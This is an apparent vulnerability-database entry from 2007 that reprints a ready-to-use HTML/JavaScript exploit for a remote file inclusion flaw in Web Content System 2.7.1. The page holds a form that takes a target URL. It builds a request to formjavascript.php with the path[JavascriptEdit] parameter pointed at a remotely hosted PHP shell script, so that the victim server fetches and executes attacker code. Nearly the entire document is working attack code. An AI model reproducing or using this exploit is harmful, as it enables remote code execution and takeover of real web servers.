Web Content System 2.7.1 Remote File Inclusion Exploit

2007-03-28T00:00:00
ID SSV:6491
Type seebug
Reporter Root
Modified 2007-03-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">
<title>Web Content System <<< v2.7.1 Remote File Include Exploit</title>

<script language=\"JavaScript\">

//\'===============================================================================================
//\'[Script Name    : Web Content System <<< v2.7.1 Remote File Include Exploit Remote File Include Exploit
//\'[Coded by       : KEZZAP66345
//\'[Author         : KEZZAP66345
//\'[Contact        : kezzap66345@hotmail.com
//\'[Dork           : :(
//\'[download.Page  : http://aysad.net/download/?id=AySystemWCS27stable
//\'[S.Page         : http://aysad.net/
//\'===============================================================================================

//\'[[ERROR]]]------------------------------------------------------
//\'....
//\'..
//\'<?
//\'
//\'<?include($path[\"JavascriptEdit\"]);?>
//\'
//\'?>
//\'....
//\'..
//\'[[ERROR]]]---------------------------------------------------------

//# kezzap66345.Turkey
//# ...



     //Basic exploit,but any time : (
   var path=\"/manage/javascript/\"
   var adres=\"/formjavascript.php?\" //dosya ad.
   var acik =\"path[JavascriptEdit]=\" // remote file include ;)
   var shell=\"http://freewebs.com/kezzap66345/1.php?\" // Shell Script

   function command(){
       if (document.rfi.target1.value==\"\"){
          alert(\"Failed..\");
      return false;
    }



  rfi.action= document.rfi.target1.value+path+adres+acik+shell; //
  rfi.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor=\"#000000\">
<center>

<p><b><font face=\"Verdana\" size=\"2\" color=\"white\">Web Content System v2.7.1 Remote File Include Exploit</font></b></p>

<p></p>
<form method=\"post\" target=\"getting\" name=\"rfi\" onSubmit=\"command();\">
    <b><font face=\"Arial\" size=\"2\" color=\"#FF0000\">Target:</font><font face=\"Arial\" size=\"1\" color=\"blue\">[http://[target]/[scriptpath]</font><font color=\"RED\" size=\"3\" face=\"Arial\">
  </font><font color=\"#FF0000\" size=\"2\"> </font></b>
  <input type=\"text\" name=\"target1\" size=\"20\" style=\"background-color: #808000\" onmouseover=\"javascript:this.style.background=\'#808080\';\" onmouseout=\"javascript:this.style.background=\'#808000\';\"></p>
  <p><input type=\"submit\" value=\"Sorgula\" name=\"B1\"><input type=\"reset\" value=\"Temizle\" name=\"B2\"></p>
</form>
<p><br>
<iframe name=\"getting\" height=\"337\" width=\"633\" scrolling=\"yes\" frameborder=\"0\"></iframe>
</p>

<b><font face=\"Verdana\" size=\"2\" color=\"#008000\">KEZZAP66345</font></b></p>
</center>
</body>
</html>